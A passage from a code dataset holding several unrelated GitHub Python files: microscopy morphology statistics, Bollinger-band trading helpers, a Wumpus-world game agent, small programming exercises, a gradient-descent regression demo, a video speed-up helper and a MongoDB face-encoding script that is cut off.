stats_df.shape[0]\n stats_df = stats_df[stats_df['Surface'] != 'Background']\n num_background = num_background - stats_df.shape[0]\n print(f'Filtered {num_background} background surfaces ({num_background/stats_df.shape[0]:0.2%})')\n\n if size_column is not None:\n if max_size is not None and max_size > 0:\n stats_df = stats_df[stats_df[size_column] <= max_size]\n if min_size is not None and min_size > 0:\n stats_df = stats_df[stats_df[size_column] >= min_size]\n\n print(f'Got {stats_df.shape} records after filtering')\n\n if remove_batch_effect:\n if batch_column not in stats_df.columns:\n raise KeyError(f'Need \"{batch_column}\" column indicating the batch number: {stats_df.columns}')\n\n category_columns = [\n 'Animal ID', 'Block', 'Section', 'Region', 'File Prefix', 'Filename',\n 'Channel', 'Surface', 'Status', 'Time', 'Timepoint', 'Group', 'Category',\n 'Treatment', batch_column,\n ]\n if timepoint_column is not None:\n category_columns.append(timepoint_column)\n if var_column is not None:\n category_columns.append(var_column)\n\n value_columns = [c for c in stats_df.columns\n if c not in category_columns and is_numeric_dtype(stats_df[c])]\n batch_labels = stats_df[batch_column].values\n old_values = stats_df[value_columns].values\n\n new_values = remove_batch_effect_means(batch_labels, old_values, mode='median')\n # new_values = remove_batch_effect_mnn(batch_labels, old_values,\n # num_neighbors=20, sigma=2.0)\n # new_values = remove_batch_effect_mnn(batch_labels, new_values,\n # num_neighbors=10, sigma=2.0)\n # new_values = 
remove_batch_effect_mnn(batch_labels, new_values,\n    #                                      num_neighbors=5, sigma=2.0)\n    for i, value_column in enumerate(value_columns):\n        stats_df[value_column] = new_values[:, i]\n\n    return stats_df\n\n\ndef calc_bin_edges(bin_min: float,\n                   bin_max: float,\n                   bin_spacing: Union[str, float] = 'linear',\n                   num_bins: int = 3) -> np.ndarray:\n    \"\"\" Calculate the edges of bins\n\n    :param float bin_min:\n        Smallest bin value\n    :param float bin_max:\n        Largest bin value\n    :param str/float bin_spacing:\n        Spacing between bins (one of linear, area, volume, log) or an exponent to raise the bins to\n    :param int num_bins:\n        How many bins to generate\n    :returns:\n        An array of n+1 bins where bin_edges[0] == bin_min and bin_edges[-1] == bin_max\n    \"\"\"\n\n    # Different kinds of spacing\n    if isinstance(bin_spacing, (int, float)):\n        power = float(bin_spacing)  # a numeric spacing is used directly as the exponent below; the old assignment left power undefined\n    elif bin_spacing in ('log', 'logarithmic'):\n        return np.logspace(bin_min, bin_max, num_bins+1)\n    elif bin_spacing in ('linear', 'radius', 'radial'):\n        # Equal radii spaced bins\n        power = 1\n    elif bin_spacing in ('area', 'circle', 'circular'):\n        # Equal area spaced bins\n        power = 2\n    elif bin_spacing in ('volume', 'sphere', 'spherical'):\n        # Equal volume spaced bins\n        power = 3\n    else:\n        raise ValueError(f'Unknown bin spacing {bin_spacing}')\n\n    # Transform, linspace, invert\n    d_min = np.abs(bin_min)**power\n    d_max = np.abs(bin_max)**power\n    bin_edges = np.linspace(d_min, d_max, num_bins+1)\n    return bin_edges**(1/power)\n\n\ndef bin_by_dist(rec: np.ndarray,\n                num_bins: int = 3,\n                bin_spacing: str = 'linear',\n                bin_edges: Optional[np.ndarray] = None) -> np.ndarray:\n    \"\"\" Bin a set of values into equally sized dist bins\n\n    :param ndarray rec:\n        The population values to split up\n    :param int num_bins:\n        The number of bins to split the population into\n    :param str bin_spacing:\n        How to spread the bins out (a valid argument to :py:func:`calc_bin_edges`)\n    :param ndarray bin_edges:\n        If not None, use these bin edges regardless\n    :returns:\n        An array the same shape as rec where ``range(0, num_bins)`` are the\n        distances from smallest to largest, and ``num_bins`` is the nan-bin\n    \"\"\"\n    # If we got pre-supplied bins, just use those\n    if bin_edges is not None:\n        bin_edges = np.array(bin_edges)\n        num_bins = bin_edges.shape[0]-1\n\n    # Split the nans out from the other values\n    nan_mask = np.isnan(rec)\n    labels = np.full(rec.shape, dtype=int, fill_value=num_bins)\n\n    if np.all(nan_mask) or num_bins < 1:\n        return labels\n\n    # Order the data by rank\n    real_rec = rec[~nan_mask]\n\n    # FIXME: Support ranking methods other than linear\n    if bin_edges is None:\n        dist_min = np.min(real_rec)\n        dist_max = np.max(real_rec)\n        bin_edges = calc_bin_edges(bin_min=dist_min,\n                                   bin_max=dist_max,\n                                   bin_spacing=bin_spacing,\n                                   num_bins=num_bins)\n\n    # Handle the case where we don't get a left and right edge\n    if bin_edges.shape[0] < 2:\n        labels[~nan_mask] = 0\n        return labels\n    assert bin_edges.shape[0] == num_bins+1\n\n    # Split each label on the bin size\n    real_labels = np.full(real_rec.shape, dtype=int, fill_value=num_bins)\n    real_labels[real_rec < bin_edges[0]] = 0\n    real_labels[real_rec >= bin_edges[-1]] = num_bins\n\n    for i, (dist_low, dist_high) in enumerate(zip(bin_edges[:-1], bin_edges[1:])):\n        mask = np.logical_and(real_rec >= dist_low, real_rec < dist_high)\n        real_labels[mask] = i\n    labels[~nan_mask] = real_labels\n    return labels\n\n\ndef bin_by_rank(rec: np.ndarray, num_bins: int = 3) -> np.ndarray:\n    \"\"\" Bin a set of values into equally sized rank bins\n\n    :param 
ndarray rec:\n The population values to split up\n :param int num_bins:\n The number of bins to split the population into\n :returns:\n An array the same shape as rec where ``range(0, num_bins)`` are the\n ranks from smallest to largest, and ``num_bins`` is the nan-bin\n \"\"\"\n\n # Split the nans out from the other values\n nan_mask = np.isnan(rec)\n labels = np.full(rec.shape, dtype=int, fill_value=num_bins)\n\n if np.all(nan_mask):\n return labels\n\n # Order the data by rank\n real_rec = rec[~nan_mask]\n order = np.argsort(real_rec)\n\n # Split each label on the bin size\n bin_size = int(np.ceil(order.shape[0]/num_bins))\n bin_st = 0\n real_labels = np.full(real_rec.shape, dtype=int, fill_value=num_bins)\n for i in range(0, num_bins):\n if bin_st >= order.shape[0]:\n break\n bin_ed = min([bin_st + bin_size, order.shape[0]])\n inds = order[bin_st:bin_ed]\n real_labels[inds] = i\n bin_st = bin_ed\n labels[~nan_mask] = real_labels\n return labels\n\n\ndef load_ylabels(channel_names: Optional[Dict[str, str]] = None,\n ylabels: Optional[Dict[str, str]] = None) -> Dict[str, str]:\n \"\"\" Load the standardized names for each feature\n\n :param dict[str, str] channel_names:\n If not None, a mapping of 'Ch=1': 'DAPI', 'Ch=2': 'Iba1', etc\n :returns:\n A list of column name: human readable column name\n \"\"\"\n if ylabels is None:\n ylabels = {}\n\n ylabels.update({\n 'NumVoxels': 'Number of Voxels',\n 'NumCoreVoxels': 'Number of Voxels in the Core',\n 'NumShellVoxels': 'Number of Voxels in the Shell',\n 'CoreRatio': 'Ratio of Core to Total Voxels',\n 'ShellRatio': 'Ratio of Shell to Total Voxels',\n 'Volume': 'Volume $(\\\\mu m^3)$',\n 'SurfaceArea': 'Surface Area $(\\\\mu m^2)$',\n 'SurfaceAreaVolume': 'Surface Area:Volume $(\\\\mu m^{-1})$',\n 'ConvexVolume': 'Convex Volume $(\\\\mu m^3)$',\n 'ConvexVolumeRatio': 'Volume:Convex Volume',\n 'ConvexSurfaceArea': 'Convex Surface Area $(\\\\mu m^2)$',\n 'ConvexSurfaceAreaRatio': 'Surface Area:Convex Hull Surface Area',\n 'BBoxVolume': 'Bounding Box Volume $(\\\\mu m^3)$',\n 'BBoxMinorAxis': 'Bounding Box Minor Axis $(\\\\mu m)$',\n 'BBoxMiddleAxis': 'Bounding Box Mid Axis $(\\\\mu m)$',\n 'BBoxMajorAxis': 'Bounding Box Major Axis $(\\\\mu m)$',\n 'BBoxAspectRatio': 'Bounding Box Aspect Ratio',\n 'EquivSphereRadius': 'Sphere Equiv Radius $(\\\\mu m)$',\n 'PercentCore': '% Core Voxels',\n 'PercentConvex': '% Convexity',\n 'PercentSurface': '% Surface Voxels',\n 'PercentBranchVoxels': '% Branch Voxels',\n 'PercentSkeleton': '% Skeleton Volume',\n 'Sphericity': 'Sphericity',\n 'EllipseAspectRatio': 'Aspect Ratio',\n 'EllipseMajorAxis': 'Major Axis $(\\\\mu m)$',\n 'EllipseMiddleAxis': 'Mid Axis $(\\\\mu m)$',\n 'EllipseMinorAxis': 'Minor Axis $(\\\\mu m)$',\n 'SkeletonNumBranches': 'Number of Branches',\n 'SkeletonNumBranchpoints': 'Number of Branchpoints',\n 'SkeletonNumShortBranches': 'Number of Short Branches',\n 'SkeletonNumLongBranches': 'Number of Long Branches',\n 'SkeletonVoxels': 'Number of Skeleton Voxels',\n 'PercentGliaLarge': '% Large Microglia',\n 'PercentGliaConvex': '% Convex Microglia',\n 'PercentGliaSpherical': '% Spherical Microglia',\n 'PercentGliaElongated': '% Elongated Microglia',\n 'PercentGliaSurface': '% High Surface Area:Volume Microglia',\n 'PercentCells': '% Cells',\n 'TotalGliaLarge': 'Number of Large Microglia',\n 'TotalGliaConvex': 'Number of Convex Microglia',\n 'TotalGliaSpherical': 'Number of Spherical Microglia',\n 'TotalGliaElongated': 'Number of Elongated Microglia',\n 'TotalGliaSurface': 'Number of High 
Surface Area:Volume Microglia',\n 'ShollNumRadiusBins': 'Number of Sholl Shells',\n 'ShollNumLabels': 'Number of Sholl Branches',\n 'ShollRadiusMax': 'Maximum Sholl Radius $(\\\\mu m)$',\n 'ShollCriticalBranches': 'Branch Voxels at Critical Radius',\n 'ShollCriticalLabels': 'Number of Branches at Critical Radius',\n 'ShollCriticalRadius': 'Critical Radius $(\\\\mu m)$',\n 'ShollSchoenenRamificationIndex': 'Schoenen Ramification Index',\n 'ShollBranchIndex': 'Sholl Branch Index',\n 'ShollRegressionCoeff': 'Sholl Branch Slope',\n 'LacunaMean': 'Mean Lacuna',\n 'LacunaStd': 'Std Lacuna',\n 'LacunaRatio': 'Lacuna Ratio',\n 'LacunaCoeff': 'Lacuna Coefficient',\n 'HausdorffDim': 'Hausdorff Dimension',\n 'HausdorffPrefactor': 'Hausdorff Prefactor',\n })\n\n # Add in the names for the mean/median/std etc\n param_names = {\n 'Mean': 'Mean',\n 'Std': 'Std',\n 'Min': 'Min',\n 'Max': 'Max',\n 'Pct05': '5th Centile',\n 'Pct25': '25th Centile',\n 'Pct50': 'Median',\n 'Pct75': '75th Centile',\n 'Pct95': '95th Centile',\n }\n for key, value in param_names.items():\n ylabels[f'Skeleton{key}BranchLen'] = f'{value} Branch Length (px)'\n for key, value in param_names.items():\n ylabels[f'{key}Radius'] = f'{value} Radius $(\\\\mu m)$'\n\n for channel_id, channel_name in channel_names.items():\n # Sholl Analysis\n ylabels[f'ShollNumRadiusBins_{channel_id}'] = 'Number of Sholl Shells'\n ylabels[f'ShollNumLabels_{channel_id}'] = 'Number of Sholl Branches'\n ylabels[f'ShollRadiusMax_{channel_id}'] = 'Maximum Sholl Radius $(\\\\mu m)$'\n ylabels[f'ShollCriticalBranches_{channel_id}'] = 'Branch Voxels at Critical Radius'\n ylabels[f'ShollCriticalLabels_{channel_id}'] = 'Number of Branches at Critical Radius'\n ylabels[f'ShollCriticalRadius_{channel_id}'] = 'Critical Radius $(\\\\mu m)$'\n ylabels[f'ShollSchoenenRamificationIndex_{channel_id}'] = 'Schoenen Ramification Index'\n ylabels[f'ShollBranchIndex_{channel_id}'] = 'Sholl Branch Index'\n ylabels[f'ShollRegressionCoeff_{channel_id}'] = 'Sholl Branch Slope'\n\n # Fractal Analysis\n ylabels[f'LacunaMean_{channel_id}'] = 'Mean Lacuna'\n ylabels[f'LacunaStd_{channel_id}'] = 'Std Lacuna'\n ylabels[f'LacunaRatio_{channel_id}'] = 'Lacuna Ratio'\n ylabels[f'LacunaCoeff_{channel_id}'] = 'Lacuna Coefficient'\n ylabels[f'HausdorffDim_{channel_id}'] = 'Hausdorff Dimension'\n ylabels[f'HausdorffPrefactor_{channel_id}'] = 'Hausdorff Prefactor'\n\n # Distance Analysis\n ylabels[f'DistMin_{channel_id}'] = f'Min Distance to {channel_name} $(\\\\mu m)$'\n ylabels[f'DistMean_{channel_id}'] = f'Mean Distance to {channel_name} $(\\\\mu m)$'\n ylabels[f'DistStd_{channel_id}'] = f'Std Distance to {channel_name} $(\\\\mu m)$'\n ylabels[f'DistMax_{channel_id}'] = f'Max Distance to {channel_name} $(\\\\mu m)$'\n ylabels[f'DistPct05_{channel_id}'] = f'5th Centile Distance to {channel_name} $(\\\\mu m)$'\n ylabels[f'DistPct25_{channel_id}'] = f'25th Centile Distance to {channel_name} $(\\\\mu m)$'\n ylabels[f'DistPct50_{channel_id}'] = f'Median Distance to {channel_name} $(\\\\mu m)$'\n ylabels[f'DistPct75_{channel_id}'] = f'75th Centile Distance to {channel_name} $(\\\\mu m)$'\n ylabels[f'DistPct95_{channel_id}'] = f'95th Centile Distance to {channel_name} $(\\\\mu m)$'\n ylabels[f'DistNumNear_{channel_id}'] = f'Number of Near {channel_name} Objects'\n ylabels[f'DistNumFar_{channel_id}'] = f'Number of Far {channel_name} Objects'\n\n # Intensity Analysis\n for key, value in param_names.items():\n ylabels[f'Intensity{key}_{channel_id}'] = f'{channel_name} {value} Intensity (AU)'\n 
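# shell, core, and volume-normalized variants follow the same naming pattern\n            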
ylabels[f'IntensityShell{key}_{channel_id}'] = f'{channel_name} {value} Shell Intensity (AU)'\n ylabels[f'IntensityCore{key}_{channel_id}'] = f'{channel_name} {value} Core Intensity (AU)'\n\n ylabels[f'NormIntensity{key}_{channel_id}'] = f'Normalized {channel_name} {value} Intensity (AU)'\n ylabels[f'NormIntensityShell{key}_{channel_id}'] = f'Normalized {channel_name} {value} Shell Intensity (AU)'\n ylabels[f'NormIntensityCore{key}_{channel_id}'] = f'Normalized {channel_name} {value} Core Intensity (AU)'\n return ylabels\n","repo_name":"denalitherapeutics/Lengerich_natneuro_2022","sub_path":"morphology/atv_trem2_morpho/qc_utils.py","file_name":"qc_utils.py","file_ext":"py","file_size_in_byte":35564,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"36886762787","text":"import pandas as pd\nimport numpy as np\nfrom binance import Client\n\ndef get_klines(client, symbol, timeframe, start, end=None):\n df = pd.DataFrame(client.get_historical_klines(symbol,\n timeframe,\n start,\n end))\n df = df[[0,1,2,3,4,5]]\n df.columns = [\"Date\",\"Open\",\"High\",\"Low\",\"Close\",\"Volume\"]\n df.Date = pd.to_datetime(df.Date, unit=\"ms\")\n df.set_index(\"Date\", inplace=True)\n df = df.astype(float)\n return df\n\ndef bollinger_bands(prices, n, stds, upper=True):\n # Convert the prices into a pandas dataframe\n df = pd.DataFrame(prices, columns=['prices'])\n\n # Calculate the moving average and standard deviation of the prices\n df['moving_average'] = df['prices'].rolling(n).mean()\n df['standard_deviation'] = df['prices'].rolling(n).std()\n\n # Calculate the upper and lower bands\n df['upper_band'] = df['moving_average'] + stds * df['standard_deviation']\n df['lower_band'] = df['moving_average'] - stds * df['standard_deviation']\n\n # Return the moving average, upper band, and lower band\n if upper:\n return df[\"upper_band\"]\n else:\n return df[\"lower_band\"]\n \n\n\ndef bollinger_bands_numpy(prices, n, stds):\n # Calculate the moving average of the prices\n moving_average = np.mean(prices[-n:])\n\n # Calculate the standard deviation of the prices\n standard_deviation = np.std(prices[-n:])\n\n # Calculate the upper band\n upper_band = moving_average + stds * standard_deviation\n\n # Calculate the lower band\n lower_band = moving_average - stds * standard_deviation\n\n return upper_band, lower_band\n\n\ndef bollinger_bands(data, window_size, num_std_dev):\n \n # Calculate the moving average\n moving_avg = np.mean(data[-window_size:])\n\n # Calculate the standard deviation\n std_dev = np.std(data[-window_size:])\n\n # Calculate the lower Bollinger band\n lower_band = moving_avg - num_std_dev * std_dev\n\n # Calculate the upper Bollinger band\n upper_band = moving_avg + num_std_dev * std_dev\n\n return (lower_band, moving_avg, upper_band)\n\n\ndef rolling_bollinger_bands(data, window_size, num_std_dev, upper):\n \"\"\"Calculates rolling Bollinger bands for given data.\n\n Parameters:\n data (numpy array): An array of values for which to calculate Bollinger bands.\n window_size (int): The size of the rolling window used to calculate the moving average and standard deviation.\n num_std_dev (int): The number of standard deviations to use as the width of the Bollinger bands.\n\n Returns:\n tuple: A tuple containing the lower Bollinger band, moving average, and upper Bollinger band for each window of data.\n \"\"\"\n # Initialize lists to store the Bollinger bands\n lower_bands = []\n moving_avgs = []\n upper_bands = []\n\n # Iterate over the 
data and calculate the Bollinger bands for each window\n    for i in range(len(data)):\n        window = data[max(0, i-window_size+1):i+1]\n\n        # Calculate the Bollinger bands for the current window\n        if len(window) >= window_size:\n            # Calculate the moving average\n            moving_avg = np.mean(window)\n\n            # Calculate the standard deviation\n            std_dev = np.std(window)\n\n            # Calculate the lower Bollinger band\n            lower_band = moving_avg - num_std_dev * std_dev\n\n            # Calculate the upper Bollinger band\n            upper_band = moving_avg + num_std_dev * std_dev\n        else:\n            # Use np.nan for values where the window is not large enough\n            moving_avg = np.nan\n            lower_band = np.nan\n            upper_band = np.nan\n\n        # Append the Bollinger bands to the lists\n        lower_bands.append(lower_band)\n        moving_avgs.append(moving_avg)\n        upper_bands.append(upper_band)\n    \n    if upper==\"upper\":\n        return upper_bands\n    elif upper == \"average\":\n        return moving_avgs\n    else:\n        return lower_bands","repo_name":"lazaros-23/thieftbot","sub_path":"backtesting/backtesting_helpers.py","file_name":"backtesting_helpers.py","file_ext":"py","file_size_in_byte":4046,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"732113690","text":"import pygame as pg\nfrom Source import *\n\nclass vertex:\n    def __init__(self,u,c):\n        self.u = u\n        self.available = []\n        self.cost = c\n    def able(self,can):\n        self.available.append(can)\n\n# The graph is bidirectional, so tiles that have already been visited must be removed.\ngraph = []\n\nfor i in range(16):\n    temp = vertex(i+1,10)\n    a = i+1\n    if a-1 > 0 and (a-1)%4 !=0:\n        temp.able(a-1)\n    if a%4 != 0:\n        temp.able(a+1)\n    if a+4 < 16:\n        temp.able(a+4)\n    if a-4 > 0:\n        temp.able(a-4)\n    graph.append(temp)\n#for i in graph:\n#    print(i.available)\ntemp = graph[2]\ntemp.cost = 1500\ngraph[2] = temp\n#2+1\n\ntemp = graph[9]\ntemp.cost = 1000\ngraph[9] = temp\n#9+1\n\ntemp = graph[13]\ntemp.cost = 1\ngraph[13] = temp\n#13+1\n\nclass Wumpus(pg.sprite.Sprite):\n    def __init__(self):\n        super(Wumpus,self).__init__()\n        size = (50,50)\n        self.pos = (240,70)\n        images = []\n        images.append(pg.image.load('04.png'))\n        self.rect = pg.Rect(self.pos,size)\n        self.images = [pg.transform.scale(image,size)for image in images]\n        self.image = images[0]\n    def update(self):\n        self.image = self.images[0]\nclass Monster(pg.sprite.Sprite):\n    def __init__(self):\n        super(Monster,self).__init__()\n        size = (50,50)\n        self.pos = (190,170)\n        images = []\n        images.append(pg.image.load('04.png'))\n        self.rect = pg.Rect(self.pos,size)\n        self.images = [pg.transform.scale(image,size)for image in images]\n        self.image = images[0]\n    def update(self):\n        self.image = self.images[0]\nclass Gold(pg.sprite.Sprite):\n    def __init__(self):\n        super(Gold,self).__init__()\n        size = (50,50)\n        self.pos = (190,220)\n        images = []\n        images.append(pg.image.load('05.png'))\n        self.rect = pg.Rect(self.pos,size)\n        self.images = [pg.transform.scale(image,size)for image in images]\n        self.image = images[0]\n    def update(self):\n        self.image = self.images[0]\nclass wall(pg.sprite.Sprite):\n    def __init__(self):\n        super(wall,self).__init__()\n        size = (200,200)\n        self.pos = zero_pos\n        self.index = 0\n        images = []\n        images.append(pg.image.load('02.png'))\n        self.rect = pg.Rect(self.pos,size)\n        self.images = [pg.transform.scale(image,size)for image in images]\n        self.image = images[self.index]\n    def update(self):\n        self.index += 1\n        if self.index >= len(self.images):\n            self.index = 0\n        self.image = self.images[self.index]\n# insert the graph here\nclass Agentshow(pg.sprite.Sprite):\n    def __init__(self):\n        
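# the agent sprite carries two images; update() switches to the second one at position (140,70)\n        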
super(Agentshow,self).__init__()\n        self.position = zero_pos\n        self.size = (50,50)\n        images = []\n        images.append(pg.image.load('01.png'))\n        images.append(pg.image.load('03.png'))\n        self.rect = pg.Rect(self.position,self.size)\n        self.images = [pg.transform.scale(image,self.size)for image in images]\n        self.index = 0\n        self.image = images[self.index]\n    def update(self,now):\n        self.position = now\n        if now == (140,70):\n            self.index = 1\n            self.image = self.images[self.index]\n            self.rect = pg.Rect(zero_pos,self.size)\n        else:\n            self.index = 0\n            self.rect = pg.Rect(self.position,self.size)\n            self.image = self.images[self.index]\n        if self.index >= len(self.images):\n            self.index = 0\n    \n    \nclass Traveler():\n    def __init__(self,start,g):\n        self.superroute = []\n        self.g = g\n        self.life = True\n        self.target = False\n        self.travel = [start]\n        self.trace = []\n        self.monster = []\n        self.wumpus = []\n        self.gold = []\n        self.now = start\n    \n    def travelroute(self):\n        if self.target == True:\n            if self.trace in self.superroute:\n                return\n            else:\n                self.superroute.append(self.trace)\n                return\n        else:\n            self.travel.remove(self.now)\n            self.trace.append(self.now)\n            print('now:',self.now.u)\n            self.deadcheck(self.now.cost)\n            self.targetcheck(self.now.cost)\n            if self.life == False:\n                self.superroute.append(self.trace)\n                self.now = self.g[0]\n                self.travel = [self.g[0]]\n                self.trace = []\n                self.life = True\n                self.travelroute()\n            for i in self.now.available:\n                real = i-1\n                self.travel.append(self.g[real])\n            for j in self.trace:\n                if j in self.travel:\n                    self.travel.remove(j)\n            for k in self.monster:\n                if k in self.travel:\n                    self.travel.remove(k)\n            for k in self.wumpus:\n                if k in self.travel:\n                    self.travel.remove(k)\n            \n            if self.now != self.g[15] and self.travel != []:\n                self.now = self.travel[0]\n                self.travelroute()\n            return\n    \n    def deadcheck(self,c):\n        if c >= 1000:\n            self.life = False\n            if c == 1000:\n                self.wumpus.append(self.now)\n            if c == 1500:\n                self.monster.append(self.now)\n            print('traveler is dead.')\n    \n    def targetcheck(self,c):\n        if c == 1:\n            self.target = True\n            self.gold.append(self.now)\n            print('found the target.')","repo_name":"CaptCore/2023_Spring_CUK","sub_path":"Agent/Agent.py","file_name":"Agent.py","file_ext":"py","file_size_in_byte":5634,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"9275513341","text":"N = int(input())\ncard = list(map(int, input().split()))  # 'card' was never defined; read the N cards into a list\nM = int(input())\nM_list = list(map(int, input().split()))\n\ncard.sort()\n\ndef BinarySearch(card, target, start, end,):\n    while(start <= end):\n        mid = (start + end) // 2\n\n        if(card[mid] == target):\n            return True\n        elif(card[mid] > target):\n            end = mid - 1\n        else:\n            start = mid + 1\n\n    return False\n\nfor i in M_list:\n    if BinarySearch(card, i, 0, N-1):\n        print(1, end = ' ')\n    else: print(0, end = ' ')","repo_name":"gaeonee/Ct","sub_path":"Baekjoon/Search/10815_숫자카드.py","file_name":"10815_숫자카드.py","file_ext":"py","file_size_in_byte":527,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"35649435515","text":"hour_of_the_exam = int(input())\r\nminute_of_the_exam = int(input())\r\nhour_of_arrival = int(input())\r\nminute_of_arrival = int(input())\r\n\r\nhours = 0\r\nminutes = 0\r\nexam_time = minute_of_the_exam + hour_of_the_exam * 60\r\narrival_time = minute_of_arrival + hour_of_arrival * 60\r\ndifference = exam_time - arrival_time\r\n\r\nif difference < 0:\r\n    print(\"Late\")\r\n    difference = abs(difference)\r\n    if 
difference >= 60:\r\n        hours = difference // 60\r\n        minutes = difference % 60\r\n        print(f\"{hours}:{minutes:02d} hours after the start\")\r\n    else:\r\n        print(f\"{difference} minutes after the start\")\r\nelif 0 <= difference <= 30:\r\n    print(\"On time\")\r\n    if difference > 0:\r\n        print(f'{difference} minutes before the start')\r\nelif difference > 30:\r\n    print(\"Early\")\r\n    if difference >= 60:\r\n        hours = difference // 60\r\n        minutes = difference % 60\r\n        print(f\"{hours}:{minutes:02d} hours before the start\")\r\n    else:\r\n        print(f\"{difference} minutes before the start\")\r\n","repo_name":"inovei6un/first_steps","sub_path":"harder_if_conditions_part_2/on_time_for_the_exam.py","file_name":"on_time_for_the_exam.py","file_ext":"py","file_size_in_byte":1014,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"25636459268","text":"from __future__ import print_function\n\nimport sys\n\nimport numpy as np\nfrom numpy import *\nfrom scipy import stats\n\n# This is an implementation of Gradient Descent in python and numpy\n# Data set of this example\n\n\ndef isfloat(value):\n\ttry:\n\t\tfloat(value)\n\t\treturn True\n\texcept Exception:\n\t\treturn False\n\n\n\ndef readData(fileName, lowFilter, highFilter):\n\n\tx=[]\n\ty=[]\n\twith open(fileName) as f:\n\t\tfor i in f:\n\t\t\ta=i.split(\",\")\n\t\t\tif(len(a)==17):\n\t\t\t\tif(isfloat(a[5]) and isfloat(a[11])):\n\t\t\t\t\tif(float(a[5])!=0 and float(a[11])!=0):\n\t\t\t\t\t\tif(float(a[11])> lowFilter and float(a[11]) < highFilter):\n\t\t\t\t\t\t\tx.append(float(a[5]))\n\t\t\t\t\t\t\ty.append(float(a[11]))\n\n\tax=np.array(x)\n\tay=np.array(y)\n\treturn np.vstack((ax, ay))\n\n\n\ndef gradient_descent_run(points, m_current, b_current, learningRate, num_iteration, precision):\n\t# m is the beta1\n\t# b is the beta 0 or Y-Intercept\n\tX=points[0]\n\tY=points[1]\n\tprevious_step_size=1\n\n\tN = float(len(Y))\n\titers=0\n\tcost = 9999999999999999\n\n\twhile (previous_step_size > precision and iters < num_iteration):\n\t\ty_current = (m_current * X) + b_current\n\t\tm_prev = m_current\n\n\t\tm_gradient = -(2/N) * sum(X * (Y - y_current))\n\t\tb_gradient = -(2/N) * sum(Y - y_current)\n\t\tnew_learningRate = learningRate\n# converges in about 1100 iterations\n# but more costly due to the cost function calculation\n#\n#\t\told_cost = cost\n#\t\tcost = sum([data**2 for data in (Y - y_current)]) / N\n#\t\tif(cost > old_cost):\n#\t\t\tnew_learningRate=learningRate*0.5\n\n\n\t\tm_current = m_current - (new_learningRate * m_gradient)\n\t\tb_current = b_current - (new_learningRate * b_gradient)\n\n\t\tprevious_step_size = abs(m_current - m_prev)\n\t\titers = iters+1\n\t\tif(iters%100==0):\n\t\t\tprint(\"Iteration: \", iters,\" Beta0 : \", \"{0:.10f}\".format(b_current) , \" Beta1 : \", \"{0:.10f}\".format(m_current) )\n\n\n\treturn m_current, b_current\n\n\n\n\n\n\n\ndef run(fileName):\n\n\tpoints = readData(fileName, 5., 100.)\n# numerical Solution\n\tslope, intercept, r_value, p_value, std_err = stats.linregress(points[0],points[1])\n\tprint(\"slope: \", slope)\n\tprint(\"intercept: \", intercept)\n\n\n# Gradient Descent\n\tstarting_b=0\n\tstarting_m=0\n\n\tlearningRate=0.00001\n\tnum_iteration=10000000\n\tprecision = 0.00000001\n\n\t[m, b] = gradient_descent_run(points, starting_m, starting_b, learningRate, num_iteration, precision)  # pass m before b to match the signature\n\n\tprint(\"======== Final Results ==============\")\n\tprint(\"Data after filter: \", points.shape)\n\tprint(\"Beta0: \", b)\n\tprint(\"Beta1: \", m)\n\n\nif __name__ == 
\"__main__\":\n\trun(sys.argv[1])\n\n\n\n# learning Rate = 0.01\n# Iteration: 1200 Beta0 : 4.3509580481 Beta1 : 2.6376461370\n# ======== Final Results ==============\n# Data after filter: (2, 1718496)\n# Beta0: 4.350962228020886\n# Beta1: 2.6376455350280423\n\n\n\n# # learning Rate = 0.001\n# Iteration: 10300 Beta0 : 4.3509000498 Beta1 : 2.6376544897\n# ======== Final Results ==============\n# Data after filter: (2, 1718496)\n# Beta0: 4.350903391574003\n# Beta1: 2.6376540084537377\n\n\n# Doing the same linear Regression with R\n# R Results\n# taxi <- read.csv(\"/home/kia/Desktop/taxi-data-sorted-small.csv\" , header = F)\n# taxi <-taxi[ which(taxi$V6 != 0 & taxi$V12 != 0 & taxi$V12 > 5 & taxi$V12 < 100), ]\n# lm(taxi$V12~taxi$V6)\n\n# Coefficients:\n# (Intercept) taxi$V6\n# 4.351 2.638\n","repo_name":"kiat/BigDataAnalytics","sub_path":"Python_examples/GradientDesent_python.py","file_name":"GradientDesent_python.py","file_ext":"py","file_size_in_byte":3247,"program_lang":"python","lang":"en","doc_type":"code","stars":48,"dataset":"github-code","pt":"32"} +{"seq_id":"4373445736","text":"from moviepy.editor import VideoFileClip\nimport moviepy.video.fx.all as vfx\n\n\ndef video_speed(in_loc, out_loc, speed_factor):\n # Import video clip\n clip = VideoFileClip(in_loc)\n print(\"fps: {}\".format(clip.fps))\n\n # Modify the FPS\n clip = clip.set_fps(clip.fps * int(speed_factor))\n\n # Apply speed up\n final = clip.fx(vfx.speedx, int(speed_factor))\n print(\"fps: {}\".format(final.fps))\n\n print(out_loc)\n # Save video clip\n final.write_videofile(out_loc)","repo_name":"Mima-Dozh/video-editor","sub_path":"video_speed.py","file_name":"video_speed.py","file_ext":"py","file_size_in_byte":485,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"25201720301","text":"import pymongo\nimport eel\nfrom bson.binary import Binary\nimport pickle\nimport configparser\n\n# create a database connection\ndef connectToDB():\n print(\"connecting to database\")\n \n config = configparser.ConfigParser()\n config.read('DB.ini')\n \n \n myclient = pymongo.MongoClient(config['database']['dbserver'])\n mydb = myclient[config['database']['db']]\n global DBCollection\n DBCollection= mydb[config['database']['dbcollection']]\n\n\n\n# inser record into database\ndef insertRecordToDB(student):\n print(\"inserting record\")\n try:\n id = DBCollection.insert_one(student).inserted_id\n except pymongo.errors.DuplicateKeyError as e:\n print(e)\n message=\"we could not insert your record\"\n eel.errorMessage(message)\n return None\n message=\"student added to database\"\n eel.successMessage(message)\n\n return id\n\n\n# get all encodings from DB\ndef queryAllEncodingsFromDB():\n students=list(DBCollection.find({},{\"_id\":1, \"Encoding\":1}))\n print(students)\n encodingsList=[]\n encodingIdList=[]\n for st in students:\n\n npArrayEncoding=pickle.loads(st[\"Encoding\"])\n 